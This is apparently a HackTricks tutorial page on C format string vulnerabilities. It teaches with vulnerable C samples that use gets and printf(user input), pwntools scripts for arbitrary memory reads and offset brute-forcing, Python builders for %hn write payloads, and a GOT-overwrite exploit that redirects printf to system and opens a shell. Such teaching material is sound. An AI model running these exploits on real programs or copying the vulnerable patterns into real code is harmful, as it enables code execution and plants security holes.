
# Format Strings

{{#include ../../banners/hacktricks-training.md}}


## Basic Information

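In C, **`printf`** is a function that **prints** a string. Its **first parameter** is the **raw text containing the formatters**. The **following parameters** are the **values** that **substitute** the **formatters** in that text.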

Other vulnerable functions include **`sprintf()`** and **`fprintf()`**.

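The vulnerability appears when **attacker-controlled text is used as the first argument** to one of these functions. The attacker can craft a **special input that abuses** the **printf format** string capabilities to read and **write any data at any address (readable/writable)**, which can lead to **arbitrary code execution**.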

#### Formatters:
```bash
%08x -> Hex value zero-padded to 8 digits (4 bytes)
%d -> Signed integer
%u -> Unsigned integer
%s -> String
%p -> Pointer
%n -> Writes the number of bytes printed so far to the pointed address
%hn -> Same as %n, but writes 2 bytes instead of 4
%<n>$x -> Direct access, Example: ("%3$d", var1, var2, var3) -> Access to var3
```
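
Python's printf-style `%` operator shares the `%x`, `%d` and `%s` conversions with C (it has no `%n`, `%p` or `<n>$` support), so it offers a quick way to sanity-check what a formatter prints. A minimal sketch, where the variable names are only illustrative:

```python
# Python's % operator follows C's rules for these conversions,
# so it can be used to check widths before building a payload.
value = 1205

padded = "%08x" % value   # zero-padded to 8 hex digits (4 bytes)
plain = "%x" % value      # same value without padding
decimal = "%d" % value    # signed decimal

print(padded, plain, decimal)
```
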
**Examples:**

- Vulnerable example:
```c
char buffer[30];
gets(buffer);  // Dangerous: takes user input without restrictions.
printf(buffer);  // If buffer contains "%x", it reads from the stack.
```
- Normal use:
```c
int value = 1205;
printf("%x %x %x", value, value, value);  // Outputs: 4b5 4b5 4b5
```
- With missing arguments:
```c
printf("%x %x %x", value);  // Unexpected output: reads random values from the stack.
```
- fprintf vulnerable:
```c
#include <stdio.h>

int main(int argc, char *argv[]) {
    if (argc < 2) {
        return 1;  // No user input supplied.
    }
    char *user_input = argv[1];
    FILE *output_file = fopen("output.txt", "w");
    if (output_file == NULL) {
        return 1;  // Could not open the output file.
    }
    fprintf(output_file, user_input);  // The user input can include formatters!
    fclose(output_file);
    return 0;
}
```
### **Accessing Pointers**

The format **`%<n>$x`**, where `n` is a number, tells printf to select the n-th parameter (from the stack). So to read the 4th parameter from the stack with printf you could do:
```c
printf("%x %x %x %x")
```
and you would read from the first to the fourth parameter.

Or you could do:
```c
printf("%4$x")
```
and read the fourth one directly.
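
The two styles can be generated programmatically when probing a target. The sketch below only builds the format strings; the helper names `sequential_probe` and `positional_probe` are hypothetical, not part of any library:

```python
def sequential_probe(n: int, conv: str = "x") -> bytes:
    """Format string that prints parameters 1..n, one after another."""
    return " ".join(f"%{conv}" for _ in range(n)).encode()


def positional_probe(n: int, conv: str = "x") -> bytes:
    """Format string that prints only parameter n, using direct access."""
    return f"%{n}${conv}".encode()


print(sequential_probe(4))  # b'%x %x %x %x'
print(positional_probe(4))  # b'%4$x'
```

The positional form keeps the payload short and constant in size, which matters when the input buffer is small.
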

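Notice that the attacker controls the `printf` **format parameter, which basically means that** their input is on the stack when `printf` is called, so they can place specific memory addresses on the stack.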

> [!CAUTION]
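> An attacker controlling this input will be able to **add arbitrary addresses to the stack and make `printf` access them**. The next section explains how to use this behaviour.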

## **Arbitrary Read**

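The formatter **`%n$s`** makes **`printf`** take the **address** located at the **n-th position** and **print it as a string** (printing until a 0x00 is found). So if the base address of the binary is **`0x8048000`** and we know that the user input starts at the 4th position on the stack, the beginning of the binary can be printed with: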
```python
from pwn import *

p = process('./bin')

payload = b'%6$s' #4th param
payload += b'xxxx' #5th param (needed to fill 8bytes with the initial input)
payload += p32(0x8048000) #6th param

p.sendline(payload)
log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'
```
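
The same kind of payload can be built without pwntools while computing the parameter index of the address automatically. This is a sketch under the assumption that the input starts exactly on a stack slot boundary at a known parameter index; `build_read_payload` is a hypothetical helper. For an input starting at parameter 4 it yields `%5$s` followed directly by the address, a one-slot-shorter variant of the payload above:

```python
import struct


def build_read_payload(addr: int, input_offset: int, word: int = 4) -> bytes:
    """Build b'%<idx>$s' + padding + packed address.

    input_offset: parameter index where our input starts (assumed known).
    word: size of one stack slot in bytes (4 on 32-bit x86).
    """
    pack = "<I" if word == 4 else "<Q"
    # The address must start on a slot boundary. Reserve 1, 2, ... slots
    # for the format text until "%<idx>$s" fits inside them.
    for slots in range(1, 8):
        idx = input_offset + slots
        fmt = f"%{idx}$s".encode()
        if len(fmt) <= slots * word:
            return fmt.ljust(slots * word, b"x") + struct.pack(pack, addr)
    raise ValueError("could not align the address")


print(build_read_payload(0x8048000, 4))
```
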
> [!CAUTION]
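> Note that you cannot put the address 0x8048000 at the beginning of the input, because the address contains a 0x00 byte and `printf` would stop processing the string there.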

### Find offset

To find the offset of your input you can send 4 or 8 bytes (`0x41414141`) followed by **`%1$x`** and **increase** the value until you retrieve the `A`s.

<details>

<summary>Brute Force printf offset</summary>
```python
# Code from https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak

from pwn import *

# Iterate over a range of integers (parameter indexes start at 1)
for i in range(1, 10):
    # Construct a payload that includes the current integer as offset
    payload = f"AAAA%{i}$x".encode()

    # Start a new process of the "chall" binary
    p = process("./chall")

    # Send the payload to the process
    p.sendline(payload)

    # Read and store the output of the process
    output = p.clean()

    # Close the process
    p.close()

    # Check if the string "41414141" (hexadecimal representation of "AAAA") is in the output
    if b"41414141" in output:
        # If the string is found, log the success message and break out of the loop
        log.success(f"User input is at offset : {i}")
        break
```
</details>
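
When the input buffer is large enough, the offset can also be recovered from a single reply instead of one process per attempt. The sketch below assumes the payload was `AAAA|%1$x|%2$x|...` and that the program echoes the formatted string back; `offset_probe`, `find_offset` and the sample reply are hypothetical:

```python
def offset_probe(count: int, marker: bytes = b"AAAA", sep: bytes = b"|") -> bytes:
    """Payload that prints parameters 1..count in hex, separated by sep."""
    return marker + b"".join(sep + f"%{i}$x".encode() for i in range(1, count + 1))


def find_offset(leak: bytes, marker: bytes = b"AAAA", sep: bytes = b"|"):
    """Return the 1-based parameter index whose value equals marker, or None."""
    # printf shows the 4 marker bytes as a little-endian integer in hex.
    wanted = format(int.from_bytes(marker, "little"), "x").encode()
    values = leak.split(sep)[1:]  # drop the echoed marker itself
    for index, value in enumerate(values, start=1):
        if value.strip() == wanted:
            return index
    return None


# Made-up reply, only to show the parsing step.
sample_reply = b"AAAA|ffffd0a0|f7fb5580|0|41414141|78243125"
print(offset_probe(5))
print(find_offset(sample_reply))
```
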

### How useful

Arbitrary reads can be useful to:

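- **Dump** the **binary** from memory
- **Access specific parts of memory where sensitive** **info** is stored (like canaries, encryption keys or custom passwords, as in this [**CTF challenge**](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value))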
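
Dumping memory with `%s` needs one extra step: each leak stops at the first 0x00, so the dumper has to re-insert that byte and continue right after it. A minimal sketch, assuming a hypothetical `leak(addr)` callback that returns what `%s` printed for `addr`; it is exercised here against a fake in-memory buffer rather than a real target:

```python
from typing import Callable


def dump_memory(leak: Callable[[int], bytes], start: int, size: int) -> bytes:
    """Rebuild `size` bytes starting at `start` from repeated %s leaks."""
    out = b""
    while len(out) < size:
        chunk = leak(start + len(out))
        # %s stopped at a NUL byte, so the byte after the chunk is 0x00.
        out += chunk + b"\x00"
    return out[:size]


# Fake target memory, used only to demonstrate the loop.
MEMORY = b"\x7fELF\x01\x01\x01\x00\x00\x00ab\x00c"
BASE = 0x8048000


def fake_leak(addr: int) -> bytes:
    begin = addr - BASE
    end = MEMORY.index(b"\x00", begin)
    return MEMORY[begin:end]


print(dump_memory(fake_leak, BASE, 12))
```
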

## **Arbitrary Write**

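The formatter **`%<num>$n`** **writes** the **number of bytes written so far** to the **address indicated** by the \<num> parameter on the stack. If an attacker can make printf output as many characters as they want, they can make **`%<num>$n`** write an arbitrary number to an arbitrary address.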

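Fortunately, to write the number 9999 it is not necessary to add 9999 "A"s to the input. Instead, the formatter **`%.<num-write>x%<num>$n`** can be used to write the number **`<num-write>`** (plus any bytes already printed before it) to the **address pointed to by the `num` position**.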
```bash
AAAA%.6000d%4\$n -> Write 6004 in the address indicated by the 4th param
AAAA.%500\$08x -> Param at offset 500
```
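
The count in the first line above can be checked with Python's `%` operator, which treats the precision in `%.6000d` the same way C does (a minimum number of digits). This is only an emulation of the output length, with `1` standing in for whatever integer printf would actually pop:

```python
# Emulate what printf would have printed before reaching %4$n.
# The 1 is a stand-in for whatever integer printf pops for %.6000d.
printed = "AAAA" + "%.6000d" % 1
count = len(printed)  # the value %n would store
print(count)

# A negative argument adds a leading '-', so the count grows by one.
negative_count = len("AAAA" + "%.6000d" % -1)
print(negative_count)
```

The second case is one reason unsigned conversions such as `%x` are often preferred for padding: their length does not depend on the sign of the value found on the stack.
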
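However, note that to write an address such as `0x08049724` (which is a HUGE number to write at once), **`$hn`** is usually used instead of `$n`. This **writes only 2 bytes**, so the operation is done twice: once for the highest 2 bytes of the address and once for the lowest 2 bytes.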

Therefore, this vulnerability allows **writing anything to any address (arbitrary write).**

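In this example, the goal is to **overwrite** the **address** of a **function** in the **GOT** table that is going to be called later. Other arbitrary-write-to-exec techniques could be abused as well: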

{{#ref}}
../arbitrary-write-2-exec/
{{#endref}}

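We are going to **overwrite** a **function** that **receives** its **arguments** from the **user** and **point** it to the **`system`** **function**.\
As mentioned, writing the address usually takes 2 steps: you **first write 2 bytes** of the address and then the other 2, using **`$hn`**.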

- **HOB** refers to the 2 higher bytes of the address
- **LOB** refers to the 2 lower bytes of the address

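Then, because of how format strings work (the count of printed bytes can only grow), you need to **write first the smallest** of \[HOB, LOB] and then the other one.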

If HOB < LOB\
`[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]\$hn`

If HOB > LOB\
`[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]\$hn`

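Field order in the example below: address of the HOB, address of the LOB, `HOB-8` padding (HOB of the shellcode address minus the 8 bytes already printed), parameter number of the HOB address, `LOB-HOB` padding, parameter number of the LOB address.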
```bash
python2 -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'
```
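
The ordering rule and the padding arithmetic can be sketched in Python. `build_hn_payload` is a hypothetical helper that assumes a 32-bit little-endian target and that the input starts at parameter `offset`; called with the values from the one-liner above (target `0x08049724`, value `0xBFFFFC2F`, offset 4) it reproduces the same bytes:

```python
import struct


def build_hn_payload(addr: int, value: int, offset: int) -> bytes:
    """Write the 32-bit `value` at `addr` using two %hn writes."""
    hob, lob = value >> 16, value & 0xFFFF
    # (half to write, parameter index of the address that receives it)
    writes = sorted([(hob, offset), (lob, offset + 1)])  # smaller half first
    payload = struct.pack("<II", addr + 2, addr)  # [address+2][address]
    printed = len(payload)  # 8 bytes are already output
    for half, param in writes:
        pad = half - printed
        if pad != 0 and pad < 8:
            # %.Nx prints at least N digits, so below 8 the count is not fixed.
            raise ValueError("padding too small for %.Nx")
        if pad:
            payload += f"%.{pad}x".encode()
        payload += f"%{param}$hn".encode()
        printed = half
    return payload


print(build_hn_payload(0x08049724, 0xBFFFFC2F, 4))
```

Sorting the two halves picks the HOB < LOB or HOB > LOB layout automatically, and swaps the parameter indexes accordingly.
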
### Pwntools Template

You can find a **template** to prepare an exploit for this kind of vulnerability in:


{{#ref}}
format-strings-template.md
{{#endref}}

Or this basic example from [**here**](https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite):
```python
from pwn import *

elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000       # ASLR disabled

p = process()

payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)

p.clean()

p.sendline(b'/bin/sh')

p.interactive()
```
## Format Strings to BOF

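It is possible to abuse the write primitive of a format string vulnerability to **write to addresses on the stack** and exploit a **buffer overflow** type of vulnerability.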

## Other Examples & References

- [https://ir0nstone.gitbook.io/notes/types/stack/format-string](https://ir0nstone.gitbook.io/notes/types/stack/format-string)
- [https://www.youtube.com/watch?v=t1LH9D5cuK4](https://www.youtube.com/watch?v=t1LH9D5cuK4)
- [https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak)
- [https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html](https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html)
- 32 bit, no relro, no canary, nx, no pie, basic use of format strings to leak the flag from the stack (no need to alter the execution flow)
- [https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html](https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html)
- 32 bit, relro, no canary, nx, no pie, format string to overwrite the address of `fflush` with the win function (ret2win)
- [https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html](https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html)
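- 32 bit, relro, no canary, nx, no pie, format string to write an address inside main into `.fini_array` (so the flow loops back one more time) and to write the address of `system` into the GOT entry of `strlen`. When the flow goes back to main, `strlen` is called with the user input as argument and, since it now points to `system`, it executes the passed commands.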

{{#include ../../banners/hacktricks-training.md}}